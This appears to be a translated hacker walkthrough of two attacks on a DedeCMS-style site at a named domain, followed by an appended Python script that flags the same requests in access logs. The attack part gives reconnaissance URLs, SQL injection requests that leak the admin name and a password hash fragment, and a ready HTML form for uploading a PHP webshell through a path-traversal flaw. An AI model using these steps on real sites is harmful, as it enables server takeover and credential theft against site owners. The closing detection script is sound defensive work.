① Injection vulnerability.
Site: http://www.political-security.com/
First visit the "/data/admin/ver.txt" page to get the time of the system's last upgrade;
then www.political-security.com/data/mysql_error_trace.inc leaks the admin backend path.
Then visit the "/member/ajax_membergroup.php?action=post&membergroup=1" page; as shown in the screenshot, this indicates the vulnerability exists.
Then enter the statement.
View the admin account:
http://www.political-security.co ... &membergroup=@`
admin
View the admin password:
http://www.political-security.co ... &membergroup=@`
8d29b1ef9f8c5a5af429
The value obtained is 19 characters long; remove the first three and the last one to get the admin's 16-character MD5:
8d2 | 9b1ef9f8c5a5af42 | 9
cmd5 couldn't crack it, so I had to try the second method.

② Upload vulnerability:
Just log in to the member center, then visit the page link
"/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post"
As shown in the screenshot, this means the upload page "/dialog/select_soft_post" has been successfully invoked via "/plus/carbuyaction.php".

So change the extension of the PHP one-line webshell to "rar" or similar, and use the submission page upload1.htm:
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
</form>
Or:
The upload then succeeds.
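A defender-side detection sketch, added here and not part of the original post: it scans constructed web-server access log lines for the request patterns the post walks through (the ver.txt and mysql_error_trace.inc disclosure files, a non-numeric membergroup value sent to ajax_membergroup.php, and a traversal rs[code] value sent to carbuyaction.php). The log format, client IPs and tag names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry: "METHOD /target HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (assumed format; not from the original post).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /data/admin/ver.txt HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /data/mysql_error_trace.inc HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /member/ajax_membergroup.php?action=post&membergroup=1 HTTP/1.1" 200 55 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:30 +0000] "GET /member/ajax_membergroup.php?action=post&membergroup=@%60 HTTP/1.1" 200 210 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:58:11 +0000] "POST /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs%5Bcode%5D=../dialog/select_soft_post HTTP/1.1" 200 340 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:14:01:00 +0000] "GET /member/ajax_membergroup.php?action=post&membergroup=3 HTTP/1.1" 200 55 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:14:02:00 +0000] "GET /plus/carbuyaction.php?dopost=memclickout&oid=12345 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

def classify(target):
    """Return alert tags for one request target; [] means nothing suspicious."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    qs = parse_qs(parts.query, keep_blank_values=True)   # decodes %5B / %60 etc.
    tags = []
    if path in ("/data/admin/ver.txt", "/data/mysql_error_trace.inc"):
        tags.append("dedecms-recon")            # version / backend-path disclosure files
    if path == "/member/ajax_membergroup.php":
        if any(not v.isdigit() for v in qs.get("membergroup", [])):
            tags.append("membergroup-injection")  # group id should be numeric only
    if path == "/plus/carbuyaction.php":
        if any("../" in v or "select_soft_post" in v for v in qs.get("rs[code]", [])):
            tags.append("carbuyaction-upload-abuse")  # traversal into the upload dialog
    return tags

def scan(log_text):
    """Return (client_ip, target, tags) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if m and (tags := classify(m.group("target"))):
            hits.append((line.split()[0], m.group("target"), tags))
    return hits

if __name__ == "__main__":
    for ip, target, tags in scan(SAMPLE_LOG):
        print(ip, ",".join(tags), target)
```

Feeding real access logs through scan() and alerting on any non-empty tag list gives a cheap rule set for the two request patterns this post relies on, independent of the response content.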